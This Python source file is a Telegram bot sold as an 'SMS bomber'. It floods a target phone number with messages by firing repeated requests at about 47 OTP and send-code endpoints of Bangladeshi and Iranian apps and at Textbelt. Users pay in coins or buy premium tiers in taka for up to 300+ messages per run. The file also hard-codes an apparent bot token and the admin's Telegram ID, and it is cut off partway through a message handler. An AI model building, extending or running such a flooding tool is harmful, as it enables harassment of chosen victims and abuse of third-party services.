# ============================================================
# 🔥 AHNAF SMS BOMBER v3.5
# Features: 45+ Providers, Daily Bonus, Premium, Leaderboard
# Low = minimum 30+ SMS guaranteed!
# Made by Ahnaf
# ============================================================

import os
import sys
import json
import time
import random
import threading
import requests
from datetime import datetime, date, timedelta
from http.server import HTTPServer, BaseHTTPRequestHandler

# ===== CONFIGURATION =====
BOT_TOKEN = "8996500921:AAHrQzeOVMjX_DUEgxv_mQfIA6LAHUnNFlE"       # @BotFather token
ADMIN_USERNAME = "@g0dfvd"              # Your username
ADMIN_USER_ID = 6409428385               # Your Telegram ID
BOT_NAME = "𝐀𝐇𝐍𝐀𝐅 𝐁𝐎𝐓"
BOT_MADE_BY = "Bot Made by Ahnaf 🤖"
DB_FILE = "users.json"

# ===== COIN SYSTEM =====
DAILY_BONUS_COINS = 10
LOW_SMS_COST = 10

# ============================================================
# DATABASE
# ============================================================

db_lock = threading.Lock()

def load_db():
    if os.path.exists(DB_FILE):
        try:
            with open(DB_FILE, "r") as f:
                return json.load(f)
        except:
            return {}
    return {}

def save_db(data):
    with db_lock:
        with open(DB_FILE, "w") as f:
            json.dump(data, f, indent=2)

def get_user(user_id):
    db = load_db()
    uid = str(user_id)
    if uid not in db:
        db[uid] = {
            "username": "",
            "first_name": "",
            "tier": "free",
            "paid_tiers": [],
            "coins": 0,
            "last_bonus_claim": "",
            "total_bombs": 0,
            "total_coins_earned": 0,
            "joined_date": str(date.today()),
            "banned": False
        }
        save_db(db)
    return db[uid]

def update_user(user_id, data):
    db = load_db()
    uid = str(user_id)
    if uid not in db:
        get_user(user_id)
        db = load_db()
    db[uid].update(data)
    save_db(db)

def is_admin(user_id):
    return str(user_id) == str(ADMIN_USER_ID)

def can_claim_bonus(user_id):
    user = get_user(user_id)
    return user.get("last_bonus_claim") != str(date.today())

def claim_bonus(user_id):
    user = get_user(user_id)
    user["coins"] = user.get("coins", 0) + DAILY_BONUS_COINS
    user["last_bonus_claim"] = str(date.today())
    user["total_coins_earned"] = user.get("total_coins_earned", 0) + DAILY_BONUS_COINS
    update_user(user_id, user)
    return user["coins"]

def has_enough_coins(user_id, amount=LOW_SMS_COST):
    user = get_user(user_id)
    return user.get("coins", 0) >= amount

def spend_coins(user_id, amount=LOW_SMS_COST):
    user = get_user(user_id)
    user["coins"] = user.get("coins", 0) - amount
    user["total_bombs"] = user.get("total_bombs", 0) + 1
    update_user(user_id, user)
    return user["coins"]

def add_paid_tier(user_id, tier):
    user = get_user(user_id)
    if tier not in user.get("paid_tiers", []):
        user["paid_tiers"].append(tier)
    user["tier"] = "paid"
    update_user(user_id, user)

def remove_paid_tier(user_id, tier=None):
    user = get_user(user_id)
    if tier and tier in user.get("paid_tiers", []):
        user["paid_tiers"].remove(tier)
    else:
        user["paid_tiers"] = []
    if not user["paid_tiers"]:
        user["tier"] = "free"
    update_user(user_id, user)

# ============================================================
# 45+ SMS API PROVIDERS — Low তে ৩০+ SMS নিশ্চিত!
# ============================================================

def get_providers(phone_number):
    digits = "".join(filter(str.isdigit, phone_number))
    
    # Format for Bangladesh: 01XXXXXXXXX
    if digits.startswith("880") and len(digits) >= 12:
        local = "0" + digits[3:]  # 01XXXXXXXXX
        full_880 = digits          # 8801XXXXXXXXX
        full_plus = "+" + digits   # +8801XXXXXXXXX
    elif digits.startswith("01") and len(digits) >= 11:
        local = digits[:11]        # 01XXXXXXXXX
        full_880 = "880" + digits[1:]  # 8801XXXXXXXXX
        full_plus = "+880" + digits[1:]  # +8801XXXXXXXXX
    else:
        local = digits[-11:] if len(digits) >= 11 else digits
        full_plus = "+" + digits if not digits.startswith("+") else digits
        full_880 = digits
    
    # Also keep international format without +
    intl = full_880  # 8801XXXXXXXXX
    
    return [
        # ===== BANGLADESH SERVICES =====
        {
            "name": "Pathao BD",
            "url": "https://api.pathao.com/api/v1/auth/send-otp",
            "method": "POST",
            "headers": {"Content-Type": "application/json", "User-Agent": "Mozilla/5.0"},
            "data": {"phone_number": full_plus}
        },
        {
            "name": "Shohoz BD",
            "url": "https://api.shohoz.com/v1/auth/send-otp",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"phone_number": local}
        },
        {
            "name": "HungryNaki",
            "url": "https://api.hungrynaki.com/api/v1/auth/send-otp",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"phone": local}
        },
        {
            "name": "Chaldal",
            "url": "https://www.chaldal.com/api/v1/auth/send-otp",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"phone": full_plus}
        },
        {
            "name": "Foodpanda",
            "url": "https://api.foodpanda.com/api/v1/auth/send-otp",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"phone_number": full_plus}
        },
        {
            "name": "Sheba.xyz",
            "url": "https://api.sheba.xyz/api/v1/auth/send-otp",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"phone": full_plus}
        },
        
        # ===== IRAN SERVICES (Snapp, Divar, etc) =====
        {
            "name": "Snapp V1",
            "url": "https://api.snapp.ir/api/v1/sms/link",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"phone": local}
        },
        {
            "name": "Snapp V2",
            "url": "https://app.snapp.taxi/api/api/v1/sms/link",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"phone": local}
        },
        {
            "name": "Divar",
            "url": "https://api.divar.ir/v5/auth/authenticate",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"phone": local}
        },
        {
            "name": "Divar V2",
            "url": "https://api.divar.ir/v5/auth/send-otp",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"phone": local}
        },
        {
            "name": "Tapsi Driver",
            "url": "https://api.tapsi.ir/api/v2.2/user",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"credential": {"phoneNumber": local, "role": "DRIVER"}, "otpOption": "SMS"}
        },
        {
            "name": "Tapsi Rider",
            "url": "https://api.tapsi.ir/api/v2.2/user",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"credential": {"phoneNumber": local, "role": "RIDER"}, "otpOption": "SMS"}
        },
        {
            "name": "Digikala V1",
            "url": "https://api.digikala.com/v1/user/authenticate/",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"username": local, "otp_call": False}
        },
        {
            "name": "Digikala V2",
            "url": "https://api.digikala.com/v1/user/forgot/check/",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"username": local}
        },
        {
            "name": "Alibaba",
            "url": "https://ws.alibaba.ir/api/v3/account/mobile/otp",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"phoneNumber": local[1:] if local.startswith("0") else local}
        },
        {
            "name": "Alibaba V2",
            "url": "https://ws.alibaba.ir/api/v3/account/mobile/otp",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"phoneNumber": intl}
        },
        {
            "name": "Jabama",
            "url": "https://gw.jabama.com/api/v4/account/send-code",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"mobile": local}
        },
        {
            "name": "Banimode",
            "url": "https://mobapi.banimode.com/api/v2/auth/request",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"phone": local}
        },
        {
            "name": "Classino",
            "url": "https://student.classino.com/otp/v1/api/login",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"mobile": local}
        },
        {
            "name": "Bikoplus",
            "url": "https://bikoplus.com/account/check-phone-number",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"phoneNumber": local}
        },
        {
            "name": "Sheypoor",
            "url": "https://www.sheypoor.com/api/v10.0.0/auth/send",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"username": full_plus}
        },
        {
            "name": "Mootanroo",
            "url": "https://api.mootanroo.com/api/v3/auth/send-otp",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"PhoneNumber": local}
        },
        {
            "name": "Tap33",
            "url": "https://tap33.me/api/v2/user",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"credential": {"phoneNumber": local, "role": "BIKER"}}
        },
        {
            "name": "GapFilm",
            "url": "https://core.gapfilm.ir/api/v3.1/Account/Login",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"Type": "3", "Username": local[1:] if local.startswith("0") else local}
        },
        {
            "name": "IToll",
            "url": "https://app.itoll.com/api/v1/auth/login",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"mobile": local}
        },
        {
            "name": "Anargift",
            "url": "https://api.anargift.com/api/v1/auth/auth",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"mobile_number": local}
        },
        {
            "name": "Lendo",
            "url": "https://api.lendo.ir/api/customer/auth/send-otp",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"mobile": local}
        },
        {
            "name": "Hamrah-Mech",
            "url": "https://www.hamrah-mechanic.com/api/v1/membership/otp",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"PhoneNumber": local}
        },
        {
            "name": "Abantether",
            "url": "https://abantether.com/users/register/phone/send/",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"phoneNumber": local}
        },
        {
            "name": "OKCS",
            "url": "https://my.okcs.com/api/check-mobile",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"mobile": local}
        },
        {
            "name": "Tebinja",
            "url": "https://www.tebinja.com/api/v1/users",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"username": local}
        },
        {
            "name": "Bit24",
            "url": "https://bit24.cash/auth/bit24/api/v3/auth/check-mobile",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"mobile": local}
        },
        {
            "name": "Rojashop",
            "url": "https://rojashop.com/api/send-otp-register",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"mobile": local}
        },
        {
            "name": "Paklean",
            "url": "https://client.api.paklean.com/download",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"tel": local}
        },
        {
            "name": "Khodro45",
            "url": "https://khodro45.com/api/v1/customers/otp/",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"mobile": local}
        },
        {
            "name": "Delino",
            "url": "https://www.delino.com/user/register",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"mobile": local}
        },
        {
            "name": "DigikalaJet",
            "url": "https://api.digikalajet.ir/user/login-register/",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"phone": local}
        },
        {
            "name": "Miare",
            "url": "https://www.miare.ir/api/otp/driver/request/",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"phone_number": local}
        },
        {
            "name": "Dosma",
            "url": "https://app.dosma.ir/api/v1/account/send-otp/",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"mobile": local}
        },
        {
            "name": "Ostadkar",
            "url": "https://api.ostadkar.ir/login",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"mobile": local}
        },
        {
            "name": "Namava",
            "url": "https://www.namava.ir/api/v1.0/accounts/registrations/by-phone/request",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"UserName": full_plus}
        },
        {
            "name": "Shab",
            "url": "https://api.shab.ir/api/fa/sandbox/v_1_4/auth/check-mobile",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"mobile": local}
        },
        {
            "name": "Bitpin",
            "url": "https://api.bitpin.org/v2/usr/signin/",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"phone": local}
        },
        {
            "name": "Taaghche",
            "url": "https://gw.taaghche.com/v4/site/auth/signup",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"contact": local}
        },
        {
            "name": "Torob",
            "url": "https://api.torob.com/v1/auth/send-otp",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"phone_number": local}
        },
        {
            "name": "Zigap",
            "url": "https://zigap.smilinno-dev.com/api/v1.6/authenticate/sendotp",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"phoneNumber": full_plus}
        },
        # ===== FREE INTERNATIONAL SMS APIS =====
        {
            "name": "Textbelt",
            "url": "https://textbelt.com/text",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"phone": full_plus, "message": "Your OTP is 123456", "key": "textbelt"}
        },
        {
            "name": "Textbelt V2",
            "url": "https://textbelt.com/text",
            "method": "POST",
            "headers": {"Content-Type": "application/json"},
            "data": {"phone": full_plus, "message": "Your verification code: 654321", "key": "textbelt"}
        },
    ]

# ============================================================
# BOMBER ENGINE
# ============================================================

class AhnafBomber:
    def __init__(self):
        self.running = False
        self.stats = {"sent": 0, "failed": 0, "total": 0}
    
    def send_request(self, provider):
        if not self.running:
            return
        try:
            h = provider.get("headers", {"Content-Type": "application/json"})
            if provider["method"] == "POST":
                r = requests.post(provider["url"], json=provider["data"], headers=h, timeout=10)
            else:
                r = requests.get(provider["url"], params=provider.get("data",{}), headers=h, timeout=10)
            if r.status_code in [200, 201, 202, 204]:
                self.stats["sent"] += 1
            else:
                self.stats["failed"] += 1
        except:
            self.stats["failed"] += 1
        self.stats["total"] += 1
    
    def start(self, phone, loops=1):
        self.running = True
        self.stats = {"sent": 0, "failed": 0, "total": 0}
        providers = get_providers(phone)
        
        print(f"📡 Total providers loaded: {len(providers)}")
        
        for loop in range(loops):
            if not self.running:
                break
            shuffled = random.sample(providers, len(providers))
            threads = []
            for p in shuffled:
                if not self.running:
                    break
                t = threading.Thread(target=self.send_request, args=(p,))
                t.start()
                threads.append(t)
                time.sleep(0.05)  # Small delay to avoid rate limiting
            for t in threads:
                t.join()
            time.sleep(0.5)
        
        self.running = False
        print(f"✅ Sent: {self.stats['sent']}, Failed: {self.stats['failed']}")
        return self.stats
    
    def stop(self):
        self.running = False

# ============================================================
# TELEGRAM BOT
# ============================================================

try:
    from telegram import Update, InlineKeyboardButton, InlineKeyboardMarkup
    from telegram.ext import Application, CommandHandler, CallbackQueryHandler, MessageHandler, filters, ContextTypes
except ImportError:
    os.system("pip install python-telegram-bot==20.7 requests flask gunicorn")
    from telegram import Update, InlineKeyboardButton, InlineKeyboardMarkup
    from telegram.ext import Application, CommandHandler, CallbackQueryHandler, MessageHandler, filters, ContextTypes

active_bombers = {}
user_states = {}

# ===== KEYBOARDS =====

def main_menu():
    kb = [
        [InlineKeyboardButton("📱 Start SMS Bomb", callback_data="send_bomb")],
        [InlineKeyboardButton("🎁 Claim Daily Bonus (10 coins)", callback_data="claim_bonus")],
        [InlineKeyboardButton("👤 My Profile", callback_data="my_profile")],
        [InlineKeyboardButton("🏆 Leaderboard", callback_data="leaderboard")],
        [InlineKeyboardButton("👥 All Users", callback_data="users_list")],
        [InlineKeyboardButton("💎 Buy Premium", callback_data="premium")],
        [InlineKeyboardButton("👤 Admin", url=f"https://t.me/{ADMIN_USERNAME.replace('@','')}")]
    ]
    return InlineKeyboardMarkup(kb)

def bomb_menu():
    kb = [
        [InlineKeyboardButton(f"🔋 Low (30+ SMS) — {LOW_SMS_COST} coins", callback_data="bomb_low")],
        [InlineKeyboardButton("⚡ Medium (90+ SMS) 💎", callback_data="bomb_medium")],
        [InlineKeyboardButton("🔥 High (150+ SMS) 💎", callback_data="bomb_high")],
        [InlineKeyboardButton("💀 Extreme (300+ SMS) 💎", callback_data="bomb_extreme")],
        [InlineKeyboardButton("🔙 Back", callback_data="back")]
    ]
    return InlineKeyboardMarkup(kb)

def admin_menu():
    kb = [
        [InlineKeyboardButton("📊 Bot Stats", callback_data="admin_stats")],
        [InlineKeyboardButton("👥 All Users", callback_data="admin_users")],
        [InlineKeyboardButton("➕ Add Premium", callback_data="admin_add")],
        [InlineKeyboardButton("➖ Remove Premium", callback_data="admin_remove")],
        [InlineKeyboardButton("⛔ Ban", callback_data="admin_ban")],
        [InlineKeyboardButton("✅ Unban", callback_data="admin_unban")],
        [InlineKeyboardButton("📢 Broadcast", callback_data="admin_broadcast")],
        [InlineKeyboardButton("🔙 Back", callback_data="back")]
    ]
    return InlineKeyboardMarkup(kb)

# ===== HANDLERS =====

async def start_cmd(update, context):
    user = update.effective_user
    uid = user.id
    username = f"@{user.username}" if user.username else user.first_name
    
    get_user(uid)
    update_user(uid, {"username": user.username or "", "first_name": user.first_name or ""})
    
    u = get_user(uid)
    if u.get("banned"):
        await update.message.reply_text("🚫 **You are banned!** Contact admin.")
        return
    
    bonus_status = "✅ Claim Now!" if can_claim_bonus(uid) else "✅ Claimed Today"
    tier = "🆓 Free" if u["tier"] == "free" else f"💎 Premium"
    
    text = f"""
╔══════════════════════════════════════╗
║        {BOT_NAME}            ║
╚══════════════════════════════════════╝

🔥 **Welcome {username}!** 🔥
🤖 {BOT_MADE_BY}

━━━━━━━━━━━━━━━━━━━━━━

**✨ YOUR STATS:**
🆔 ID: `{uid}`
🎚 Tier: {tier}
🪙 Coins: {u.get('coins', 0)}
🎁 Daily Bonus: {bonus_status}
📦 Total Bombs: {u.get('total_bombs', 0)}

━━━━━━━━━━━━━━━━━━━━━━

**📌 SMS INTENSITY:**
🔋 **Low** — 30+ SMS (10 coins / Free)
⚡ **Medium** — 90+ SMS (💎 Premium)
🔥 **High** — 150+ SMS (💎 Premium)
💀 **Extreme** — 300+ SMS (💎 Premium)

━━━━━━━━━━━━━━━━━━━━━━

🎁 Daily bonus = 10 coins → 1 Low SMS free!
💎 Premium = Unlimited SMS (no coins needed)
👤 Contact: {ADMIN_USERNAME}
🤖 {BOT_MADE_BY}
    """
    
    await update.message.reply_text(text, reply_markup=main_menu(), parse_mode="Markdown")

async def send_cmd(update, context):
    uid = update.effective_user.id
    u = get_user(uid)
    if u.get("banned"):
        await update.message.reply_text("🚫 You are banned!")
        return
    
    await update.message.reply_text(
        "📱 **Send target phone number:**\n\n"
        "Example: `01712345678`\n"
        "Or: `+8801712345678`",
        parse_mode="Markdown"
    )
    user_states[uid] = {"state": "number"}

async def stop_cmd(update, context):
    uid = update.effective_user.id
    if uid in active_bombers and active_bombers[uid] and active_bombers[uid].running:
        active_bombers[uid].stop()
        active_bombers[uid] = None
        await update.message.reply_text("🛑 **Bombing stopped!**", reply_markup=main_menu())
    else:
        await update.message.reply_text("❌ No active bombing.", reply_markup=main_menu())

async def status_cmd(update, context):
    uid = update.effective_user.id
    if uid in active_bombers and active_bombers[uid] and active_bombers[uid].running:
        b = active_bombers[uid]
        await update.message.reply_text(
            f"📊 **Live Status:**\n✅ Sent: {b.stats['sent']}\n❌ Failed: {b.stats['failed']}\n📦 Total: {b.stats['total']}",
            parse_mode="Markdown"
        )
    else:
        await update.message.reply_text("📊 No active session.", reply_markup=main_menu())

async def help_cmd(update, context):
    text = f"""
🆘 **HELP - {BOT_NAME}**

━━━━━━━━━━━━━━━━━━━━━━

**📱 HOW TO USE:**
1️⃣ /send — Enter target number
2️⃣ Choose intensity level
3️⃣ Watch SMS flood! (30-300+ SMS)

━━━━━━━━━━━━━━━━━━━━━━

**🎚 INTENSITY (45+ API Providers):**

🔋 **Low** — 1 loop = 30+ SMS
   • 10 coins OR free for premium
   
⚡ **Medium** 💎 — 3 loops = 90+ SMS
   
🔥 **High** 💎 — 5 loops = 150+ SMS

💀 **Extreme** 💎 — 10 loops = 300+ SMS

━━━━━━━━━━━━━━━━━━━━━━

**🪙 COIN SYSTEM:**
• 🎁 Daily bonus = 10 coins free
• 🔋 10 coins = 1 Low SMS (30+ SMS)
• 💎 Premium = UNLIMITED, no coins needed!

━━━━━━━━━━━━━━━━━━━━━━
💰 **Buy Premium:** {ADMIN_USERNAME}
🤖 {BOT_MADE_BY}
    """
    await update.message.reply_text(text, parse_mode="Markdown", reply_markup=main_menu())

# ===== BUTTON HANDLER =====

async def button_handler(update, context):
    q = update.callback_query
    await q.answer()
    uid = update.effective_user.id
    data = q.data
    username = f"@{update.effective_user.username}" if update.effective_user.username else "User"
    
    u = get_user(uid)
    if u.get("banned") and data not in ["back"]:
        await q.edit_message_text("🚫 You are banned!", reply_markup=main_menu())
        return
    
    if data == "back":
        await q.edit_message_text("🔙 **Main Menu**", reply_markup=main_menu(), parse_mode="Markdown")
    
    elif data == "claim_bonus":
        if can_claim_bonus(uid):
            new_balance = claim_bonus(uid)
            await q.edit_message_text(
                f"🎁 **Daily Bonus Claimed!** ✅\n\n"
                f"🪙 +10 coins added!\n"
                f"💰 Balance: {new_balance} coins\n\n"
                f"🔋 Send 1 Low SMS for {LOW_SMS_COST} coins (30+ SMS)!",
                parse_mode="Markdown", reply_markup=main_menu()
            )
        else:
            await q.edit_message_text(
                f"❌ **Already claimed today!**\n\n"
                f"Next: **{date.today() + timedelta(days=1)}**\n"
                f"🪙 Your coins: {u.get('coins', 0)}",
                parse_mode="Markdown", reply_markup=main_menu()
            )
    
    elif data == "send_bomb":
        await q.edit_message_text(
            "📱 **Send target phone number:**\n\nExample: `01712345678`",
            parse_mode="Markdown"
        )
        user_states[uid] = {"state": "number"}
    
    elif data == "my_profile":
        u = get_user(uid)
        tier = "🆓 Free" if u["tier"] == "free" else f"💎 Premium ({', '.join(u.get('paid_tiers',[]))})"
        bonus_status = "✅ Available" if can_claim_bonus(uid) else "❌ Claimed today"
        
        text = f"""
👤 **YOUR PROFILE**

━━━━━━━━━━━━━━━━━━━━━━

🆔 **ID:** `{uid}`
👤 **Username:** @{u.get('username', 'N/A')}
🎚 **Tier:** {tier}
🪙 **Coins:** {u.get('coins', 0)}
🎁 **Daily Bonus:** {bonus_status}
📦 **Total Bombs Sent:** {u.get('total_bombs', 0)}
🏆 **Total Coins Earned:** {u.get('total_coins_earned', 0)}
📅 **Joined:** {u.get('joined_date', 'N/A')}

━━━━━━━━━━━━━━━━━━━━━━
🤖 {BOT_MADE_BY}
        """
        await q.edit_message_text(text, parse_mode="Markdown", reply_markup=main_menu())
    
    elif data == "leaderboard":
        db = load_db()
        sorted_users = sorted(db.items(), key=lambda x: x[1].get('total_bombs', 0), reverse=True)
        
        text = "🏆 **LEADERBOARD** 🏆\n━━━━━━━━━━━━━━━━━━━━━━\n\n"
        rank = 1
        for uid2, udata in sorted_users[:10]:
            if udata.get('banned'):
                continue
            name = f"@{udata['username']}" if udata['username'] else udata['first_name']
            bombs = udata.get('total_bombs', 0)
            coins = udata.get('coins', 0)
            tier_icon = "💎" if udata['tier'] == 'paid' else "🆓"
            text += f"{rank}. {name} {tier_icon} — {bombs} bombs, {coins} coins\n"
            rank += 1
        
        if rank == 1:
            text += "No users yet! 🚀"
        
        text += "\n━━━━━━━━━━━━━━━━━━━━━━\nUse the bot and climb the ranks!"
        await q.edit_message_text(text, parse_mode="Markdown", reply_markup=main_menu())
    
    elif data == "users_list":
        db = load_db()
        total = len(db)
        paid = sum(1 for u2 in db.values() if u2.get("tier") == "paid")
        banned_count = sum(1 for u2 in db.values() if u2.get("banned"))
        active_today = sum(1 for u2 in db.values() if u2.get("last_bonus_claim") == str(date.today()))
        
        text = f"""
👥 **ALL USERS**

━━━━━━━━━━━━━━━━━━━━━━

📊 **Total:** {total}
💎 **Premium:** {paid}
🆓 **Free:** {total - paid - banned_count}
🚫 **Banned:** {banned_count}
🎁 **Active Today:** {active_today}

━━━━━━━━━━━━━━━━━━━━━━

**Recent Users:**
        """
        
        sorted_users = sorted(db.items(), key=lambda x: x[1].get('joined_date', ''), reverse=True)
        count = 0
        for uid2, udata in sorted_users[:15]:
            if udata.get('banned'):
                continue
            name = f"@{udata['username']}" if udata['username'] else udata['first_name']
            coins = udata.get('coins', 0)
            bombs = udata.get('total_bombs', 0)
            tier_icon = "💎" if udata['tier'] == 'paid' else "🆓"
            text += f"• {name} {tier_icon} — {coins}🪙, {bombs}💣\n"
            count += 1
        
        if count == 0:
            text += "No active users yet.\n"
        
        await q.edit_message_text(text, parse_mode="Markdown", reply_markup=main_menu())
    
    elif data == "premium":
        await q.edit_message_text(
            f"💎 **PREMIUM PLANS** 💎\n\n"
            f"━━━━━━━━━━━━━━━━━━━━━━\n\n"
            f"⚡ **Medium** (3x loops = 90+ SMS) — **50 TK**\n"
            f"🔥 **High** (5x loops = 150+ SMS) — **100 TK**\n"
            f"💀 **Extreme** (10x loops = 300+ SMS) — **200 TK**\n\n"
            f"━━━━━━━━━━━━━━━━━━━━━━\n\n"
            f"🔥 **COMBO:** All 3 = **300 TK** (Lifetime)\n\n"
            f"💳 bKash / Nagad / Rocket\n"
            f"📲 **Contact:** {ADMIN_USERNAME}\n\n"
            f"━━━━━━━━━━━━━━━━━━━━━━\n"
            f"💎 Premium = UNLIMITED use, NO coins needed!\n"
            f"🆓 Free = 10 coins daily bonus",
            parse_mode="Markdown", reply_markup=main_menu()
        )
    
    elif data.startswith("bomb_"):
        level = data.split("_")[1]
        
        if uid not in user_states or "number" not in user_states.get(uid, {}):
            await q.edit_message_text("❌ No number set! Use /send", reply_markup=main_menu())
            return
        
        phone = user_states[uid]["number"]
        u = get_user(uid)
        
        loops = {"low": 1, "medium": 3, "high": 5, "extreme": 10}
        loop_count = loops.get(level, 1)
        
        sms_count = {"low": "30+", "medium": "90+", "high": "150+", "extreme": "300+"}
        
        if level == "low":
            if u["tier"] != "paid":
                if not has_enough_coins(uid, LOW_SMS_COST):
                    await q.edit_message_text(
                        f"❌ **Not enough coins!**\n\n"
                        f"🪙 You have: {u.get('coins', 0)} coins\n"
                        f"💰 Need: {LOW_SMS_COST} coins\n\n"
                        f"🎁 Claim daily bonus for 10 free coins!",
                        reply_markup=main_menu()
                    )
                    return
                spend_coins(uid, LOW_SMS_COST)
        else:
            if level not in u.get("paid_tiers", []):
                await q.edit_message_text(
                    f"❌ **{level.upper()} is Premium only!**\n\n"
                    f"💎 Buy: {ADMIN_USERNAME}",
                    reply_markup=main_menu()
                )
                return
        
        await q.edit_message_text(
            f"🚀 **Bombing Started!**\n\n"
            f"📱 Target: `{phone}`\n"
            f"⚡ Level: {level.upper()} ({sms_count.get(level, '30+')} SMS)\n"
            f"🔄 Loops: {loop_count}\n"
            f"👤 By: {username}\n\n"
            f"╔══════════════════════════════╗\n"
            f"║     📊 /status — Live Stats  ║\n"
            f"║     🛑 /stop — Stop          ║\n"
            f"╚══════════════════════════════╝\n\n"
            f"⏳ Sending via 45+ providers...",
            parse_mode="Markdown"
        )
        
        def run_bomb():
            bomber = AhnafBomber()
            active_bombers[uid] = bomber
            stats = bomber.start(phone, loop_count)
            
            import asyncio
            loop = asyncio.new_event_loop()
            asyncio.set_event_loop(loop)
            
            u_updated = get_user(uid)
            msg = f"""
✅ **Bombing Complete!**

📱 Target: `{phone}`
⚡ Level: {level.upper()}
━━━━━━━━━━━━━━━━━━━━━━
✅ **Sent:** {stats['sent']}
❌ **Failed:** {stats['failed']}
📦 **Total:** {stats['total']}

🪙 **Balance:** {u_updated.get('coins', 0)} coins
━━━━━━━━━━━━━━━━━━━━━━
            """
            if u["tier"] != "paid":
                msg += "🎁 Claim daily bonus for more coins!\n"
            msg += f"\n🔙 /start for main menu\n🤖 {BOT_MADE_BY}"
            
            loop.run_until_complete(
                context.bot.send_message(
                    chat_id=update.effective_chat.id,
                    text=msg,
                    parse_mode="Markdown",
                    reply_markup=main_menu()
                )
            )
            loop.close()
            active_bombers[uid] = None
        
        t = threading.Thread(target=run_bomb, daemon=True)
        t.start()
    
    # ===== ADMIN =====
    elif data.startswith("admin_"):
        if not is_admin(uid):
            return
        action = data.split("_")[1]
        
        if action == "stats":
            db = load_db()
            total = len(db)
            paid = sum(1 for u2 in db.values() if u2.get("tier") == "paid")
            banned_count = sum(1 for u2 in db.values() if u2.get("banned"))
            active_today = sum(1 for u2 in db.values() if u2.get("last_bonus_claim") == str(date.today()))
            total_coins = sum(u2.get("coins", 0) for u2 in db.values())
            total_bombs = sum(u2.get("total_bombs", 0) for u2 in db.values())
            
            await q.edit_message_text(
                f"📊 **BOT STATS**\n"
                f"━━━━━━━━━━━━━\n"
                f"👥 Total: {total}\n"
                f"💎 Premium: {paid}\n"
                f"🆓 Free: {total-paid-banned_count}\n"
                f"🚫 Banned: {banned_count}\n"
                f"🎁 Active Today: {active_today}\n"
                f"🪙 Total Coins: {total_coins}\n"
                f"📦 Total Bombs: {total_bombs}\n"
                f"━━━━━━━━━━━━━\n"
                f"🕒 {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}",
                parse_mode="Markdown", reply_markup=admin_menu()
            )
        
        elif action == "users":
            db = load_db()
            text = "👥 **ALL USERS:**\n\n"
            for uid2, udata in sorted(db.items(), key=lambda x: x[1].get('joined_date',''), reverse=True)[:30]:
                name = f"@{udata['username']}" if udata['username'] else udata['first_name']
                coins = udata.get('coins', 0)
                bombs = udata.get('total_bombs', 0)
                tier_icon = "💎" if udata['tier'] == 'paid' else "🆓"
                ban = "🚫" if udata.get('banned') else ""
                text += f"`{str(uid2)[:6]}..` {name} {tier_icon}{ban} ({coins}🪙/{bombs}💣)\n"
            text += f"\n**Total: {len(db)} users**"
            await q.edit_message_text(text, parse_mode="Markdown", reply_markup=admin_menu())
        
        elif action in ["add", "remove", "ban", "unban", "broadcast"]:
            cmds = {
                "add": "➕ `/add @username tier`\nTiers: medium, high, extreme",
                "remove": "➖ `/remove @username` or `/remove @username tier`",
                "ban": "⛔ `/ban @username`",
                "unban": "✅ `/unban @username`",
                "broadcast": "📢 `/broadcast Your message`"
            }
            await q.edit_message_text(cmds.get(action, ""), parse_mode="Markdown", reply_markup=admin_menu())

# ===== MESSAGE HANDLER =====

async def msg_handler(update, context):
    uid = update.effective_user.id
    text = update.message.text.strip()
    
    u = get_user(uid)
    if u.get("banned"):
